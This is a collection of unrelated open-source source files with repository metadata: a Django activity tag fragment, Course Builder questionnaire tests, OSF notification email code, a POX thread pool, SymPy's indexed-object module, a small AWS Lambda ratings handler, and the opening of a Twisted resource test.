fragment = "comments"
if object_type == 'map':
activity_class = 'map'
if object_type == 'layer':
activity_class = 'layer'
if raw_action == 'deleted':
activity_class = 'delete'
if raw_action == 'created' and object_type == 'layer':
activity_class = 'upload'
ctx = dict(
activity_class=activity_class,
action=action,
actor=actor,
object=object,
object_name=object_name,
preposition=preposition,
target=target,
timestamp=action.timestamp,
username=username,
verb=verb,
fragment=fragment
)
return ctx
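# Template usage sketch (hypothetical template; activity_item is registered
# above as an inclusion tag rendering social/_activity_item.html):
#
#     {% load social_tags %}
#     {% for action in actions %}
#         {% activity_item action %}
#     {% endfor %}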
|
gpl-3.0
|
ram8647/gcb-mobilecsp
|
modules/questionnaire/questionnaire_tests.py
|
4
|
9221
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the questionnaire module."""
__author__ = 'Neema Kotonya ([email protected])'
from common import crypto
from controllers import sites
from models import courses
from models import models
from models import transforms
from models.data_sources import utils as data_sources_utils
from modules.questionnaire.questionnaire import QuestionnaireDataSource
from modules.questionnaire.questionnaire import StudentFormEntity
from tests.functional import actions
from google.appengine.api import namespace_manager
COURSE_NAME = 'questionnaire_tag_test_course'
ADMIN_EMAIL = '[email protected]'
UNIQUE_FORM_ID = 'This-is-the-unique-id-for-this-form'
STUDENT_EMAIL = '[email protected]'
STUDENT_NAME = 'A. Test Student'
TEST_FORM_HTML = """
<form id="This-is-the-unique-id-for-this-form">
Course Name: <input name="course_name" type="text" value=""><br>
Unit Name: <input name="unit_name" type="text" value=""><br>
</form>"""
QUESTIONNAIRE_TAG = """
<gcb-questionnaire
form-id="This-is-the-unique-id-for-this-form"
instanceid="hnWDW6Ld4RdO">
</gcb-questionnaire><br>
"""
class BaseQuestionnaireTests(actions.TestBase):
"""Tests for REST endpoint and tag renderer."""
def setUp(self):
super(BaseQuestionnaireTests, self).setUp()
actions.login(ADMIN_EMAIL, is_admin=True)
self.base = '/' + COURSE_NAME
test_course = actions.simple_add_course(
COURSE_NAME, ADMIN_EMAIL, 'Questionnaire Test Course')
self.old_namespace = namespace_manager.get_namespace()
namespace_manager.set_namespace('ns_%s' % COURSE_NAME)
self.course = courses.Course(None, test_course)
test_unit = self.course.add_unit()
test_unit.availability = courses.AVAILABILITY_AVAILABLE
test_lesson = self.course.add_lesson(test_unit)
test_lesson.availability = courses.AVAILABILITY_AVAILABLE
test_lesson.title = 'This is a lesson that contains a form.'
test_lesson.objectives = '%s\n%s' % (TEST_FORM_HTML, QUESTIONNAIRE_TAG)
self.unit_id = test_unit.unit_id
self.lesson_id = test_lesson.lesson_id
self.course.save()
actions.logout()
def tearDown(self):
del sites.Registry.test_overrides[sites.GCB_COURSES_CONFIG.name]
namespace_manager.set_namespace(self.old_namespace)
super(BaseQuestionnaireTests, self).tearDown()
def get_button(self):
dom = self.parse_html_string(self.get('unit?unit=%s&lesson=%s' % (
self.unit_id, self.lesson_id)).body)
return dom.find('.//button[@class="gcb-button questionnaire-button"]')
def register(self):
user = actions.login(STUDENT_EMAIL, is_admin=False)
actions.register(self, STUDENT_NAME)
return models.Student.get_enrolled_student_by_user(user)
class QuestionnaireTagTests(BaseQuestionnaireTests):
def test_submit_answers_button_out_of_session(self):
button = self.get_button()
self.assertEquals(UNIQUE_FORM_ID, button.attrib['data-form-id'])
self.assertEquals('false', button.attrib['data-registered'])
def test_submit_answers_button_in_session_no_student(self):
actions.login(STUDENT_EMAIL, is_admin=False)
button = self.get_button()
self.assertEquals(UNIQUE_FORM_ID, button.attrib['data-form-id'])
self.assertEquals('false', button.attrib['data-registered'])
def test_submit_answers_button_student_in_session(self):
actions.login(STUDENT_EMAIL, is_admin=False)
actions.register(self, STUDENT_NAME)
button = self.get_button()
self.assertEquals(UNIQUE_FORM_ID, button.attrib['data-form-id'])
self.assertEquals('true', button.attrib.get('data-registered'))
class QuestionnaireRESTHandlerTests(BaseQuestionnaireTests):
REST_URL = 'rest/modules/questionnaire'
PAYLOAD_DICT = {
'form_data': [
{u'query': u''},
{u'course_name': u'course_name'},
{u'unit_name': u'unit_name'}]}
def _post_form_to_rest_handler(self, request_dict):
return transforms.loads(self.post(
self.REST_URL,
{'request': transforms.dumps(request_dict)}).body)
def _get_rest_request(self, payload_dict):
xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
'questionnaire')
return {
'xsrf_token': xsrf_token,
'payload': payload_dict
}
def _put_data_in_datastore(self, student):
data = StudentFormEntity.load_or_default(student, UNIQUE_FORM_ID)
data.value = transforms.dumps(self.PAYLOAD_DICT)
data.put()
return data.value
def test_rest_handler_right_data_retrieved(self):
self.register()
response = self._post_form_to_rest_handler(
self._get_rest_request(self.PAYLOAD_DICT))
self.assertEquals(200, response['status'])
def test_rest_handler_requires_xsrf(self):
response = self._post_form_to_rest_handler({'xsrf_token': 'BAD TOKEN'})
self.assertEquals(403, response['status'])
def test_rest_handler_only_allows_enrolled_user_to_submit(self):
response = self._post_form_to_rest_handler(self._get_rest_request({}))
self.assertEquals(401, response['status'])
self.register()
response = self._post_form_to_rest_handler(self._get_rest_request({}))
self.assertEquals(200, response['status'])
def test_form_data_in_datastore(self):
student = self.register()
self._put_data_in_datastore(student)
response = StudentFormEntity.load_or_default(student, UNIQUE_FORM_ID)
self.assertNotEqual(None, response)
def test_form_data_can_be_retrieved(self):
student = self.register()
self._put_data_in_datastore(student)
response = self._get_rest_request(self.PAYLOAD_DICT)
self.assertEquals(self.PAYLOAD_DICT, response['payload'])
class QuestionnaireDataSourceTests(BaseQuestionnaireTests):
FORM_0_DATA = [
{u'name': u'title', u'value': u'War and Peace'},
{u'name': u'rating', u'value': u'Long'}]
FORM_1_DATA = [
{u'name': u'country', u'value': u'Greece'},
{u'name': u'lang', u'value': u'el_EL'},
{u'name': u'tld', u'value': u'el'}]
# Form 2 tests malformed data
FORM_2_DATA = [
{u'value': u'value without name'}, # missing 'name' field
{u'name': u'name without value'}, # missing 'value' field
{u'name': u'numeric', u'value': 3.14}] # non-string value
FORM_2_DATA_OUT = [
{u'name': None, u'value': u'value without name'},
{u'name': u'name without value', u'value': None},
{u'name': u'numeric', u'value': u'3.14'}]
def test_data_extraction(self):
# Register a student and save some form values for that student
student = self.register()
entity = StudentFormEntity.load_or_default(student, 'form-0')
entity.value = transforms.dumps({
u'form_data': self.FORM_0_DATA})
entity.put()
entity = StudentFormEntity.load_or_default(student, u'form-1')
entity.value = transforms.dumps({
u'form_data': self.FORM_1_DATA})
entity.put()
entity = StudentFormEntity.load_or_default(student, u'form-2')
entity.value = transforms.dumps({
u'form_data': self.FORM_2_DATA})
entity.put()
# Log in as admin for the data query
actions.logout()
actions.login(ADMIN_EMAIL, is_admin=True)
xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
data_sources_utils.DATA_SOURCE_ACCESS_XSRF_ACTION)
pii_secret = crypto.generate_transform_secret_from_xsrf_token(
xsrf_token, data_sources_utils.DATA_SOURCE_ACCESS_XSRF_ACTION)
safe_user_id = crypto.hmac_sha_2_256_transform(
pii_secret, student.user_id)
response = self.get(
'rest/data/questionnaire_responses/items?'
'data_source_token=%s&page_number=0' % xsrf_token)
data = transforms.loads(response.body)['data']
self.assertEqual(3, len(data))
for index in range(3):
self.assertIn(safe_user_id, data[index]['user_id'])
self.assertEqual('form-%s' % index, data[index]['questionnaire_id'])
self.assertEqual(self.FORM_0_DATA, data[0]['form_data'])
self.assertEqual(self.FORM_1_DATA, data[1]['form_data'])
self.assertEqual(self.FORM_2_DATA_OUT, data[2]['form_data'])
def test_exportable(self):
self.assertTrue(QuestionnaireDataSource.exportable())
|
apache-2.0
|
asanfilippo7/osf.io
|
website/notifications/emails.py
|
15
|
6935
|
from babel import dates, core, Locale
from website import mails
from website import models as website_models
from website.notifications import constants
from website.notifications import utils
from website.notifications.model import NotificationDigest
from website.notifications.model import NotificationSubscription
from website.util import web_url_for
def notify(event, user, node, timestamp, **context):
"""Retrieve appropriate ***subscription*** and passe user list
:param event: event that triggered the notification
:param user: user who triggered notification
:param node: instance of Node
:param timestamp: time event happened
:param context: optional variables specific to templates
target_user: used with comment_replies
:return: List of user ids notifications were sent to
"""
event_type = utils.find_subscription_type(event)
subscriptions = compile_subscriptions(node, event_type, event)
sent_users = []
target_user = context.get('target_user', None)
if target_user:
target_user_id = target_user._id
if event_type in constants.USER_SUBSCRIPTIONS_AVAILABLE:
subscriptions = get_user_subscriptions(target_user, event_type)
for notification_type in subscriptions:
if notification_type != 'none' and subscriptions[notification_type]:
if user in subscriptions[notification_type]:
subscriptions[notification_type].pop(subscriptions[notification_type].index(user))
if target_user and target_user_id in subscriptions[notification_type]:
subscriptions[notification_type].pop(subscriptions[notification_type].index(target_user_id))
if target_user_id != user._id:
store_emails([target_user_id], notification_type, 'comment_replies', user, node,
timestamp, **context)
sent_users.append(target_user_id)
if subscriptions[notification_type]:
store_emails(subscriptions[notification_type], notification_type, event_type, user, node,
timestamp, **context)
sent_users.extend(subscriptions[notification_type])
return sent_users
def store_emails(recipient_ids, notification_type, event, user, node, timestamp, **context):
"""Store notification emails
Emails are sent via celery beat as digests
:param recipient_ids: List of user ids to send mail to.
:param notification_type: from constants.Notification_types
:param event: event that triggered notification
:param user: user who triggered the notification
:param node: instance of Node
:param timestamp: time event happened
:param context:
:return: --
"""
if notification_type == 'none':
return
template = event + '.html.mako'
context['user'] = user
node_lineage_ids = get_node_lineage(node) if node else []
for user_id in recipient_ids:
if user_id == user._id:
continue
recipient = website_models.User.load(user_id)
context['localized_timestamp'] = localize_timestamp(timestamp, recipient)
message = mails.render_message(template, **context)
digest = NotificationDigest(
timestamp=timestamp,
send_type=notification_type,
event=event,
user_id=user_id,
message=message,
node_lineage=node_lineage_ids
)
digest.save()
def compile_subscriptions(node, event_type, event=None, level=0):
"""Recurse through node and parents for subscriptions.
:param node: current node
:param event_type: Generally node_subscriptions_available
:param event: Particular event such a file_updated that has specific file subs
:param level: How deep the recursion is
:return: a dict of notification types with lists of users.
"""
subscriptions = check_node(node, event_type)
if event:
subscriptions = check_node(node, event) # Gets particular event subscriptions
parent_subscriptions = compile_subscriptions(node, event_type, level=level + 1) # get node and parent subs
elif node.parent_id:
parent_subscriptions = \
compile_subscriptions(website_models.Node.load(node.parent_id), event_type, level=level + 1)
else:
parent_subscriptions = check_node(None, event_type)
for notification_type in parent_subscriptions:
p_sub_n = parent_subscriptions[notification_type]
p_sub_n.extend(subscriptions[notification_type])
for nt in subscriptions:
if notification_type != nt:
p_sub_n = list(set(p_sub_n).difference(set(subscriptions[nt])))
if level == 0:
p_sub_n, removed = utils.separate_users(node, p_sub_n)
parent_subscriptions[notification_type] = p_sub_n
return parent_subscriptions
def check_node(node, event):
"""Return subscription for a particular node and event."""
node_subscriptions = {key: [] for key in constants.NOTIFICATION_TYPES}
if node:
subscription = NotificationSubscription.load(utils.to_subscription_key(node._id, event))
for notification_type in node_subscriptions:
users = getattr(subscription, notification_type, [])
for user in users:
if node.has_permission(user, 'read'):
node_subscriptions[notification_type].append(user._id)
return node_subscriptions
def get_user_subscriptions(user, event):
user_subscription = NotificationSubscription.load(utils.to_subscription_key(user._id, event))
return {key: getattr(user_subscription, key, []) for key in constants.NOTIFICATION_TYPES}
def get_node_lineage(node):
""" Get a list of node ids in order from the node to top most project
e.g. [parent._id, node._id]
"""
lineage = [node._id]
while node.parent_id:
node = website_models.Node.load(node.parent_id)
lineage = [node._id] + lineage
return lineage
def get_settings_url(uid, user):
if uid == user._id:
return web_url_for('user_notifications', _absolute=True)
node = website_models.Node.load(uid)
    assert node, 'get_settings_url received an invalid Node id'
return node.web_url_for('node_setting', _guid=True, _absolute=True)
def localize_timestamp(timestamp, user):
try:
user_timezone = dates.get_timezone(user.timezone)
except LookupError:
user_timezone = dates.get_timezone('Etc/UTC')
try:
user_locale = Locale(user.locale)
except core.UnknownLocaleError:
user_locale = 'en'
formatted_date = dates.format_date(timestamp, format='full', locale=user_locale)
formatted_time = dates.format_time(timestamp, format='short', tzinfo=user_timezone, locale=user_locale)
return u'{time} on {date}'.format(time=formatted_time, date=formatted_date)
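# Worked example for localize_timestamp (illustrative; assumes a user with an
# English locale and UTC timezone):
#
#     localize_timestamp(datetime.datetime(2015, 3, 14, 9, 26), user)
#     # -> u'9:26 AM on Saturday, March 14, 2015'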
|
apache-2.0
|
XianliangJ/collections
|
Jellyfish/pox/pox/lib/threadpool.py
|
6
|
2913
|
# Copyright 2012 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Totally untested thread pool class.
Tries to not get more than "maximum" (but this is not a hard limit).
Kills off up to around half of its workers when more than half are idle.
"""
from __future__ import with_statement
from threading import Thread, RLock
from Queue import Queue
CYCLE_TIME = 3
class WorkerThread (Thread):
def __init__ (self, pool):
Thread.__init__(self)
self._pool = pool
self.daemon = True
self.start()
def run (self):
with self._pool._lock:
self._pool._total += 1
while self._pool.running:
with self._pool._lock:
self._pool._available += 1
try:
func, args, kw = self._pool._tasks.get(True, CYCLE_TIME)
if func is None: return
except:
continue
finally:
with self._pool._lock:
self._pool._available -= 1
assert self._pool._available >= 0
try:
func(*args, **kw)
except Exception as e:
print "Worker thread exception", e
self._pool._tasks.task_done()
with self._pool._lock:
self._pool._total -= 1
assert self._pool._total >= 0
class ThreadPool (object):
#NOTE: Assumes only one thread manipulates the pool
# (Add some locks to fix)
  def __init__ (self, initial = 0, maximum = None):
    self._available = 0
    self._total = 0
    self._tasks = Queue()
    self.maximum = maximum
    self._lock = RLock()
    self.running = True  # checked by WorkerThread.run(); was never set anywhere
    for i in xrange(initial):
      self._new_worker()  # was: self._new_worker (missing call parentheses)
def _new_worker (self):
with self._lock:
if self.maximum is not None:
if self._total >= self.maximum:
# Too many!
return False
WorkerThread(self)
return True
  def add (_self, _func, *_args, **_kwargs):
    _self.add_task(_func, args=_args, kwargs=_kwargs)  # was: self.add_task (NameError)
def add_task (self, func, args=(), kwargs={}):
while True:
self._lock.acquire()
if self._available == 0:
self._lock.release()
self._new_worker()
else:
break
self._tasks.put((func, args, kwargs))
    if self._available > self._total / 2 and self._total > 8:
for i in xrange(self._total / 2 - 1):
self._tasks.put((None,None,None))
self._lock.release()
def join (self):
self._tasks.join()
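# Minimal smoke test (an illustrative sketch, not part of POX; the module
# itself warns the pool is untested). Relies on the running flag and the
# _new_worker() call fixed above.
if __name__ == '__main__':
  def _work (n):
    print "task", n

  pool = ThreadPool(initial=1, maximum=4)
  for i in xrange(4):
    pool.add_task(_work, args=(i,))
  pool.join()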
|
gpl-3.0
|
kaichogami/sympy
|
sympy/tensor/indexed.py
|
12
|
17230
|
"""Module that defines indexed objects
The classes IndexedBase, Indexed and Idx would represent a matrix element
M[i, j] as in the following graph::
    1) The Indexed class represents the entire indexed object.
               |
            ___|___
           '       '
            M[i, j]
           /   \__\______
           |    |
           |    |
           |    2) The Idx class represents indices; each Idx can
           |       optionally contain information about its range.
           |
    3) IndexedBase represents the `stem' of an indexed object, here `M'.
       The stem used by itself is usually taken to represent the entire
       array.
There can be any number of indices on an Indexed object. No
transformation properties are implemented in these Base objects, but
implicit contraction of repeated indices is supported.
Note that the support for complicated (i.e. non-atomic) integer
expressions as indices is limited. (This should be improved in
future releases.)
Examples
========
To express the above matrix element example you would write:
>>> from sympy.tensor import IndexedBase, Idx
>>> from sympy import symbols
>>> M = IndexedBase('M')
>>> i, j = symbols('i j', cls=Idx)
>>> M[i, j]
M[i, j]
Repeated indices in a product implies a summation, so to express a
matrix-vector product in terms of Indexed objects:
>>> x = IndexedBase('x')
>>> M[i, j]*x[j]
x[j]*M[i, j]
If the indexed objects will be converted to component based arrays, e.g.
with the code printers or the autowrap framework, you also need to provide
(symbolic or numerical) dimensions. This can be done by passing an
optional shape parameter to IndexedBase upon construction:
>>> dim1, dim2 = symbols('dim1 dim2', integer=True)
>>> A = IndexedBase('A', shape=(dim1, 2*dim1, dim2))
>>> A.shape
(dim1, 2*dim1, dim2)
>>> A[i, j, 3].shape
(dim1, 2*dim1, dim2)
If an IndexedBase object has no shape information, it is assumed that the
array is as large as the ranges of its indices:
>>> n, m = symbols('n m', integer=True)
>>> i = Idx('i', m)
>>> j = Idx('j', n)
>>> M[i, j].shape
(m, n)
>>> M[i, j].ranges
[(0, m - 1), (0, n - 1)]
The above can be compared with the following:
>>> A[i, 2, j].shape
(dim1, 2*dim1, dim2)
>>> A[i, 2, j].ranges
[(0, m - 1), None, (0, n - 1)]
To analyze the structure of indexed expressions, you can use the methods
get_indices() and get_contraction_structure():
>>> from sympy.tensor import get_indices, get_contraction_structure
>>> get_indices(A[i, j, j])
(set([i]), {})
>>> get_contraction_structure(A[i, j, j])
{(j,): set([A[i, j, j]])}
See the appropriate docstrings for a detailed explanation of the output.
"""
# TODO: (some ideas for improvement)
#
# o test and guarantee numpy compatibility
# - implement full support for broadcasting
# - strided arrays
#
# o more functions to analyze indexed expressions
# - identify standard constructs, e.g matrix-vector product in a subexpression
#
# o functions to generate component based arrays (numpy and sympy.Matrix)
# - generate a single array directly from Indexed
# - convert simple sub-expressions
#
# o sophisticated indexing (possibly in subclasses to preserve simplicity)
# - Idx with range smaller than dimension of Indexed
# - Idx with stepsize != 1
# - Idx with step determined by function call
from __future__ import print_function, division
from sympy.core import Expr, Tuple, Symbol, sympify, S
from sympy.core.compatibility import is_sequence, string_types, NotIterable, range
class IndexException(Exception):
pass
class Indexed(Expr):
"""Represents a mathematical object with indices.
>>> from sympy.tensor import Indexed, IndexedBase, Idx
>>> from sympy import symbols
>>> i, j = symbols('i j', cls=Idx)
>>> Indexed('A', i, j)
A[i, j]
It is recommended that Indexed objects are created via IndexedBase:
>>> A = IndexedBase('A')
>>> Indexed('A', i, j) == A[i, j]
True
"""
is_commutative = True
def __new__(cls, base, *args):
from sympy.utilities.misc import filldedent
if not args:
raise IndexException("Indexed needs at least one index.")
if isinstance(base, (string_types, Symbol)):
base = IndexedBase(base)
elif not hasattr(base, '__getitem__') and not isinstance(base, IndexedBase):
raise TypeError(filldedent("""
Indexed expects string, Symbol or IndexedBase as base."""))
args = list(map(sympify, args))
return Expr.__new__(cls, base, *args)
@property
def base(self):
"""Returns the IndexedBase of the Indexed object.
Examples
========
>>> from sympy.tensor import Indexed, IndexedBase, Idx
>>> from sympy import symbols
>>> i, j = symbols('i j', cls=Idx)
>>> Indexed('A', i, j).base
A
>>> B = IndexedBase('B')
>>> B == B[i, j].base
True
"""
return self.args[0]
@property
def indices(self):
"""
Returns the indices of the Indexed object.
Examples
========
>>> from sympy.tensor import Indexed, Idx
>>> from sympy import symbols
>>> i, j = symbols('i j', cls=Idx)
>>> Indexed('A', i, j).indices
(i, j)
"""
return self.args[1:]
@property
def rank(self):
"""
Returns the rank of the Indexed object.
Examples
========
>>> from sympy.tensor import Indexed, Idx
>>> from sympy import symbols
>>> i, j, k, l, m = symbols('i:m', cls=Idx)
>>> Indexed('A', i, j).rank
2
>>> q = Indexed('A', i, j, k, l, m)
>>> q.rank
5
>>> q.rank == len(q.indices)
True
"""
return len(self.args) - 1
@property
def shape(self):
"""Returns a list with dimensions of each index.
Dimensions is a property of the array, not of the indices. Still, if
the IndexedBase does not define a shape attribute, it is assumed that
the ranges of the indices correspond to the shape of the array.
>>> from sympy.tensor.indexed import IndexedBase, Idx
>>> from sympy import symbols
>>> n, m = symbols('n m', integer=True)
>>> i = Idx('i', m)
>>> j = Idx('j', m)
>>> A = IndexedBase('A', shape=(n, n))
>>> B = IndexedBase('B')
>>> A[i, j].shape
(n, n)
>>> B[i, j].shape
(m, m)
"""
from sympy.utilities.misc import filldedent
if self.base.shape:
return self.base.shape
try:
return Tuple(*[i.upper - i.lower + 1 for i in self.indices])
except AttributeError:
raise IndexException(filldedent("""
Range is not defined for all indices in: %s""" % self))
except TypeError:
raise IndexException(filldedent("""
Shape cannot be inferred from Idx with
undefined range: %s""" % self))
@property
def ranges(self):
"""Returns a list of tuples with lower and upper range of each index.
If an index does not define the data members upper and lower, the
corresponding slot in the list contains ``None`` instead of a tuple.
Examples
========
>>> from sympy import Indexed,Idx, symbols
>>> Indexed('A', Idx('i', 2), Idx('j', 4), Idx('k', 8)).ranges
[(0, 1), (0, 3), (0, 7)]
>>> Indexed('A', Idx('i', 3), Idx('j', 3), Idx('k', 3)).ranges
[(0, 2), (0, 2), (0, 2)]
>>> x, y, z = symbols('x y z', integer=True)
>>> Indexed('A', x, y, z).ranges
[None, None, None]
"""
ranges = []
for i in self.indices:
try:
ranges.append(Tuple(i.lower, i.upper))
except AttributeError:
ranges.append(None)
return ranges
def _sympystr(self, p):
indices = list(map(p.doprint, self.indices))
return "%s[%s]" % (p.doprint(self.base), ", ".join(indices))
class IndexedBase(Expr, NotIterable):
"""Represent the base or stem of an indexed object
    The IndexedBase class represents an array that contains elements. The main purpose
of this class is to allow the convenient creation of objects of the Indexed
class. The __getitem__ method of IndexedBase returns an instance of
Indexed. Alone, without indices, the IndexedBase class can be used as a
notation for e.g. matrix equations, resembling what you could do with the
Symbol class. But, the IndexedBase class adds functionality that is not
available for Symbol instances:
- An IndexedBase object can optionally store shape information. This can
      be used to check array conformance and conditions for numpy
broadcasting. (TODO)
- An IndexedBase object implements syntactic sugar that allows easy symbolic
representation of array operations, using implicit summation of
repeated indices.
- The IndexedBase object symbolizes a mathematical structure equivalent
to arrays, and is recognized as such for code generation and automatic
compilation and wrapping.
>>> from sympy.tensor import IndexedBase, Idx
>>> from sympy import symbols
>>> A = IndexedBase('A'); A
A
>>> type(A)
<class 'sympy.tensor.indexed.IndexedBase'>
When an IndexedBase object receives indices, it returns an array with named
axes, represented by an Indexed object:
>>> i, j = symbols('i j', integer=True)
>>> A[i, j, 2]
A[i, j, 2]
>>> type(A[i, j, 2])
<class 'sympy.tensor.indexed.Indexed'>
The IndexedBase constructor takes an optional shape argument. If given,
it overrides any shape information in the indices. (But not the index
ranges!)
>>> m, n, o, p = symbols('m n o p', integer=True)
>>> i = Idx('i', m)
>>> j = Idx('j', n)
>>> A[i, j].shape
(m, n)
>>> B = IndexedBase('B', shape=(o, p))
>>> B[i, j].shape
(o, p)
"""
is_commutative = True
def __new__(cls, label, shape=None, **kw_args):
if isinstance(label, string_types):
label = Symbol(label)
elif isinstance(label, Symbol):
pass
else:
raise TypeError("Base label should be a string or Symbol.")
if is_sequence(shape):
shape = Tuple(*shape)
else:
shape = sympify(shape)
if shape is not None:
obj = Expr.__new__(cls, label, shape, **kw_args)
else:
obj = Expr.__new__(cls, label, **kw_args)
obj._shape = shape
return obj
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return Indexed(self, *indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return Indexed(self, indices, **kw_args)
@property
def shape(self):
"""Returns the shape of the IndexedBase object.
Examples
========
>>> from sympy import IndexedBase, Idx, Symbol
>>> from sympy.abc import x, y
>>> IndexedBase('A', shape=(x, y)).shape
(x, y)
Note: If the shape of the IndexedBase is specified, it will override
any shape information given by the indices.
>>> A = IndexedBase('A', shape=(x, y))
>>> B = IndexedBase('B')
>>> i = Idx('i', 2)
>>> j = Idx('j', 1)
>>> A[i, j].shape
(x, y)
>>> B[i, j].shape
(2, 1)
"""
return self._shape
@property
def label(self):
"""Returns the label of the IndexedBase object.
Examples
========
>>> from sympy import IndexedBase
>>> from sympy.abc import x, y
>>> IndexedBase('A', shape=(x, y)).label
A
"""
return self.args[0]
def _sympystr(self, p):
return p.doprint(self.label)
class Idx(Expr):
"""Represents an integer index as an Integer or integer expression.
There are a number of ways to create an Idx object. The constructor
takes two arguments:
``label``
An integer or a symbol that labels the index.
``range``
Optionally you can specify a range as either
- Symbol or integer: This is interpreted as a dimension. Lower and
upper bounds are set to 0 and range - 1, respectively.
- tuple: The two elements are interpreted as the lower and upper
bounds of the range, respectively.
Note: the Idx constructor is rather pedantic in that it only accepts
integer arguments. The only exception is that you can use oo and -oo to
specify an unbounded range. For all other cases, both label and bounds
must be declared as integers, e.g. if n is given as an argument then
n.is_integer must return True.
For convenience, if the label is given as a string it is automatically
converted to an integer symbol. (Note: this conversion is not done for
range or dimension arguments.)
Examples
========
>>> from sympy.tensor import Idx
>>> from sympy import symbols, oo
>>> n, i, L, U = symbols('n i L U', integer=True)
If a string is given for the label an integer Symbol is created and the
bounds are both None:
>>> idx = Idx('qwerty'); idx
qwerty
>>> idx.lower, idx.upper
(None, None)
Both upper and lower bounds can be specified:
>>> idx = Idx(i, (L, U)); idx
i
>>> idx.lower, idx.upper
(L, U)
When only a single bound is given it is interpreted as the dimension
and the lower bound defaults to 0:
>>> idx = Idx(i, n); idx.lower, idx.upper
(0, n - 1)
>>> idx = Idx(i, 4); idx.lower, idx.upper
(0, 3)
>>> idx = Idx(i, oo); idx.lower, idx.upper
(0, oo)
"""
is_integer = True
def __new__(cls, label, range=None, **kw_args):
from sympy.utilities.misc import filldedent
if isinstance(label, string_types):
label = Symbol(label, integer=True)
label, range = list(map(sympify, (label, range)))
if label.is_Number:
if not label.is_integer:
raise TypeError("Index is not an integer number.")
return label
if not label.is_integer:
raise TypeError("Idx object requires an integer label.")
elif is_sequence(range):
if len(range) != 2:
raise ValueError(filldedent("""
Idx range tuple must have length 2, but got %s""" % len(range)))
for bound in range:
if not (bound.is_integer or abs(bound) is S.Infinity):
raise TypeError("Idx object requires integer bounds.")
args = label, Tuple(*range)
elif isinstance(range, Expr):
if not (range.is_integer or range is S.Infinity):
raise TypeError("Idx object requires an integer dimension.")
args = label, Tuple(0, range - 1)
elif range:
raise TypeError(filldedent("""
The range must be an ordered iterable or
integer SymPy expression."""))
else:
args = label,
obj = Expr.__new__(cls, *args, **kw_args)
return obj
@property
def label(self):
"""Returns the label (Integer or integer expression) of the Idx object.
Examples
========
>>> from sympy import Idx, Symbol
>>> x = Symbol('x', integer=True)
>>> Idx(x).label
x
>>> j = Symbol('j', integer=True)
>>> Idx(j).label
j
>>> Idx(j + 1).label
j + 1
"""
return self.args[0]
@property
def lower(self):
"""Returns the lower bound of the Index.
Examples
========
>>> from sympy import Idx
>>> Idx('j', 2).lower
0
>>> Idx('j', 5).lower
0
>>> Idx('j').lower is None
True
"""
try:
return self.args[1][0]
except IndexError:
return
@property
def upper(self):
"""Returns the upper bound of the Index.
Examples
========
>>> from sympy import Idx
>>> Idx('j', 2).upper
1
>>> Idx('j', 5).upper
4
>>> Idx('j').upper is None
True
"""
try:
return self.args[1][1]
except IndexError:
return
def _sympystr(self, p):
return p.doprint(self.label)
|
bsd-3-clause
|
Vilsepi/infinimonkey
|
backend/ratings-api.py
|
1
|
1556
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import json
import boto3
table = boto3.resource("dynamodb").Table(os.environ.get("RAMBLINGS_TABLE_NAME"))
# def update_item_rating(vote):
# table.update_item(
# Key={
# 'username': 'janedoe',
# 'last_name': 'Doe'
# },
# UpdateExpression='SET age = :val1',
# ExpressionAttributeValues={
# ':val1': 26
# }
# )
# Earlier stub of update_rating, superseded by the full version below; kept
# commented out so the module has exactly one definition of the handler.
# def update_rating(event, context):
#     print(event)
#     #update_item_rating("VOTE_UP")
#     return {
#         "statusCode": 200,
#         "body": "{\"vote\": \"ok\"}",
#         "headers": {"Access-Control-Allow-Origin": "*"}
#     }
def update_rating(event, context):
rambling_id = event.get("pathParameters", {}).get("id")
vote = event.get("pathParameters", {}).get("vote")
if vote in ["vote_up", "vote_down"]:
_dynamo_update_field(rambling_id, vote, 1)
return {
"statusCode": 200,
"body": "{\"vote\": \"ok\"}",
"headers": {"Access-Control-Allow-Origin": "*"}
}
def _dynamo_update_field(id, field, value):
table.update_item(
Key={"id": id},
UpdateExpression="SET {} = :val1".format(field),
ExpressionAttributeValues={":val1": value}
#--update-expression "SET Price = Price + :incr" \
#--expression-attribute-values '{":incr":{"N":"5"}}' \
)
# Serverless function configuration for wiring this handler (YAML; kept as a
# comment so the module remains valid Python):
#
# apiUpdateRating:
#   handler: ramblings-api.update_rating
#   memorySize: 256
#   events:
#     - http:
#         path: ramblings/{id}/ratings/{vote}
#         method: post
#         cors: true
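# Local smoke-test sketch (hypothetical event shaped like an API Gateway proxy
# request; actually writing requires RAMBLINGS_TABLE_NAME and AWS credentials):
#
#     fake_event = {"pathParameters": {"id": "abc-123", "vote": "vote_up"}}
#     print(update_rating(fake_event, None))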
|
mit
|
demarle/VTK
|
ThirdParty/Twisted/twisted/web/test/test_resource.py
|
43
|
8158
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.resource}.
"""
from twisted.trial.unittest import TestCase
from twisted.web.error import UnsupportedMethod
from twisted.web.resource import (
NOT_FOUND, FORBIDDEN, Resource, ErrorPage, NoResource, ForbiddenResource,
getChildForRequest)
from twisted.web.test.requesthelper import DummyRequest
class ErrorPageTests(TestCase):
"""
